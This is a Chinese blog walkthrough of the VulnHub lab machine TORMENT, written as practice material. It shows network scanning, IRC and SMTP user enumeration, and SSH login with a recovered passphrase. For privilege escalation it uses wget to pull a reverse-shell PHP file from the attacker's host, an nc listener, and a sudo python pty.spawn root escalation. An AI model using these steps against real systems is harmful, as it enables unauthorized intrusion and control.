vulnhub靶场digitalworld.local: TORMENT

最新推荐文章于 2025-04-01 11:00:00 发布
最新推荐文章于 2025-04-01 11:00:00 发布
阅读量782 收藏 29
点赞数 23
分类专栏: [ vulnhub靶机通关篇 ] 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58091216/article/details/143187583
版权

一.环境搭建

1.靶场描述

2.靶场下载

https://download.vulnhub.com/digitalworld/TORMENT.7z

3.靶场启动

二.信息收集

1.寻找靶场真实的IP地址

nmap -sP 192.168.79.0/24

arp-scan -l

kaliIP地址为192.168.79.129

2.探测端口及服务

nmap -p- -sV http://192.168.79.129

我们可以看到开启的端口有好多,重点我们看看21,22,135,445,631端口

我们查看631端口

点击Printers,发现一些名称,收集下来当作用户字典尝试爆破。

三.渗透测试

1.访问web服务

http://192.168.79.129

是一个apache2服务

因为扫描不到任何有用的信息,所以这里我们不在进行扫描

2.渗透测试

1)ftp服务

我们看到开启了21端口,我们进行连接

我们可以看到有group,passwd等等备份文件,但是我们没有权限查看

我们在看看其他的

2)ngircd软件

我们可以看到有ngircd软件和ssh

在Kali Linux中,ngircd是一个轻量级的IRC(Internet Relay Chat)服务器软件‌。它允许用户在自己的系统上搭建IRC服务器,用于聊天室、文件共享、实时通信等目的。Kali Linux作为一款专注于安全渗透测试和数字取证的操作系统,虽然其主要功能并非直接提供IRC服务,但ngircd的存在为用户提供了一个灵活的工具,可以在渗透测试或安全研究过程中模拟IRC环境,进行相关的安全分析和测试。

我们查看ngircd目录和ssh命令

这里IP地址变为192.168.79.130

我们查看channels,可以看到2个频道,games tormentedprinter

尝试ssh公钥连接,但是需要key

3)hexchat访问目标系统

我们安装ngircd服务器

HexChat是一个开源的IRC客户端‌
‌软件平台‌:Windows、Linux和Unix。
‌软件特性‌:基于XChat开发,但HexChat在任何平台上都是完全免费的。它继承了X-Chat的经典特性,并在功能和用户体验上进行了优化。
‌技术特点‌: ‌加密通讯‌:基于GPLv2许可发布,允许自由编译、链接以及使用OpenSSL,具备强大的加密通讯能力。
‌跨平台兼容性‌:采用C语言编写,确保了良好的性能和跨平台兼容性。
‌扩展性‌:提供了一个完整的API,支持Python和Perl脚本编程,让开发者可以轻松扩展其功能。

apt install hexchat  

hexchat

输入目标系统IP地址,但是没有密码。

cd /etc/ngircd
cat ngircd.conf

kali本地下载ngircd,查看默认密码——wealllikedebian

我们进行连接,首先我们查看games频道,发现什么也没有,我们查看tormentedprinter

我们可以看到一串密码,mostmachineshaveasupersecurekeyandalongpassphrase

这个密码可能是ssh的key,但是我们不知道用户名,我们使用smtp进行扫描

4)smtp扫描用户名

我们扫描出来2个用户名,一个是Patrick,一个是Qiu

5)ssh登录

ssh使用密钥尝试登陆用户,最后patrick成功登陆

6)提权

发现只有关机,重启具有root权限

find / -perm 777 -type f 2>/dev/null

发现apache服务的apache.conf对所有用户都具有读写权限。

编辑apache.conf文件,添加如下内容

此时下载反弹shell文件,然后再重启服务

cd /var/www/html/
wget http://192.168.79.128/MS02423.php
sudo /bin/systemctl reboot

重启之后访问http://192.168.79.130/MS02423.php,成功获取到shell

查看当前用户权限,发现python具有root权限,直接使用sudo python -c 'import pty;pty.spawn("/bin/bash")'即可提权

nc -lvnp 9999
python -c 'import pty;pty.spawn("/bin/bash")' 
sudo -l 
sudo python -c 'import pty;pty.spawn("/bin/bash")'

Torment-vulnhub靶机记录
m0_46580995的博客
08-11 346
开始经典的主机发现端口扫描 有21端口可以开心的匿名登录 成功登录并发现有ssh 和一个没见过的ngircd 跟进发现有一个密钥和一个channels get下来 首先尝试一下ngircd登录 apt-get install hexchat apt-get install ngircd 添加靶机地址(密码是后加的)但是没有密码因为用到的是ngircd尝试用其默认密码登录 cd /etc/ngircd cat ngircd.conf 在配置文件中找到默认密码wealllikedebian登录并
1、VulnHub(基础准备)
weixin_43850732的博客
06-24 339
1、vulnhub基础准备扫描靶机IPNmapArp-scanNetdiscover开启简易HTTP服务python方式php方式 扫描靶机IP 默认在导入靶机镜像后是不知道靶机IP地址的,第一步是扫描发现到靶机的IP地址。 Nmap ping 扫描 nmap -sP 192.168.100.1/24 no ping 扫描 nmap -nP 192.168.100.1/24 Arp-scan arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批
digitalworld.local:Torment Vulnhub Walkthrough
ElegantHedgehog的博客
08-22 381
主机层面扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.135Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-09 14:58 CSTNmap scan report for 10.10.202.135Host is up (0.0012s latency).Not shown: 65516 closed portsPORT STATE SERVICE VERSION21/tcp open ...
Vulnhub-AI-Web1.0靶场通关攻略
最新发布
qq_65852138的博客
04-01 443
【代码】Vulnhub-AI-Web1.0靶场通关攻略。
靶机渗透练习56-digitalworld.localTORMENT
hirak0的博客
04-19 4338
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil twin of JOY. Unlike JOY, this machine is designed to drive you crazy. Stephen Hawking once mentioned, “God plays dice and throws them into places where th
vulnhub(De-ICE S1.100, S1.110)
公众号shadow sock7
01-16 1259
学了两个vulnhub上的box De-ICE S1.100 De-ICE S1.110 非常详细的writeup: http://blog.nullmode.com/blog/2013/10/31/de-ice-s1-dot-100-level-1-a-beginners-guide/
VulnHub——DC-3
菜鸟的学习笔记
12-30 266
DC-3 信息搜集 使用nmap进行探测和扫描 已知信息: CMS为Joomla 访问网页,没有多余的提示,表明仅有一个入口点。 搜索后得知访问/modules/mod_login/mod_login.xml文件可以查看版本,发现版本为3.1,并且发现了一个路径。 /administrator/components/com_menus/models/fields,/adminisrtator为后台登陆页面。 漏洞挖掘与利用 1、既然发现是Joomla,那么从github查找相应的工具进行攻击。 找到
PlanarItems:检修Planescape中的项目:Torment,增强版
02-10
平面物品 检修Planescape中的项目:折磨,...该mod更改了(最终)Planescape:Torment(增强版)中的所有项目,目的是平衡选项并使各个级别的游戏更加有趣。 在该软件的官方Beamdog论坛线程上有一个可用的商品目录。
增强游戏体验:PlanarItems对Planescape: Torment的修改
在深入分析文件信息之前,需要明确"Planescape: Torment"是一款角色扮演游戏,由黑岛工作室开发,并由Beamdog进行了增强版的发行。考虑到给出的信息较少,将侧重于主题相关的知识点,即Planescape: Torment的游戏...
PST-UB-reloaded:Qwinn原版PS未完成业务的改良与兼容性增强
1. Planescape: Torment 未完成业务(PS:T UB) - PST-UB-reloaded是基于Qwinn最初发布的PS:T未完成业务(PST-UB)的改进版本。这表明其开发是建立在一个已经存在的游戏模组之上,而不是从零开始。 - PST-UB是基于...
神性:原罪II全高清壁纸「Divinity: Original Sin II full hd wallpaper」-crx插件
03-17
神性:原罪二全高清壁纸和铬新标签免费安装。...如果您是Baldur's Gate,Ultima,Planescape:TormentFallout等经典CRPG的粉丝,那么诸如Original Sin之类的游戏便是现代游戏风格的先锋。 支持语言:English
VulnHub—DC-7
weixin_39219503的博客
02-02 551
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
Vulnhub--Gaara
从不专注的人的博客
06-16 497
目录Vulnhub--Gaara信息收集扫描目标网段扫描端口及服务版本目录扫描漏洞利用hydra破解ssh登陆进行提权查看文件 Vulnhub–Gaara 靶机下载地址:https://www.vulnhub.com/entry/gaara-1,629/ 信息收集 扫描目标网段 我们先使用nmap命令扫描网段 扫描端口及服务版本 然后我们访问80端口,没有发现什么有用的信息 目录扫描 然后我们来进行目录扫描 dir -u http://172.16.58.138/ -w /usr/share/dir
VulnHub_FunBox
qq_45434762的博客
08-29 643
发现目标主机我们使用nmap扫描整个网段sudo nmap 192.168.1.0/24 扫描端口使用Nmap探测目标主机开放的端口,发现目标主机开放了,21,22,80端口sudo n...
Vulnhub_Noob
qq_45434762的博客
09-18 1508
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息Kali:192.168.31.216Noob:192.168.31.192信息收集使用Nmap扫描探测目标主机开放了21、80、55055三个端口nmap -sS -p- 192.168.31...
Vulnhub DC-6
柠檬木有枝
07-14 520
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
VulnHub-toppo
江左盟的博客
06-11 1万+
信息收集 漏洞发现 漏洞利用 q
VulnHub-Lord Of The Root_1.0.1-靶机渗透学习
嗯嗯呐的博客
11-17 1043
靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ 靶机难度:中等(CTF) 靶机描述:这是KoocSec为黑客练习准备的另一个Boot2Root挑战。他通过OSCP考试的启发准备了这一过程。它基于伟大的小说改制电影《指环王》的概念。 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、信息采集 nmap扫描确定靶机IP地址 扫描靶机对外开放端口,开始信息采集 只扫描出22端口 连接22端口获得提示 knock f
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值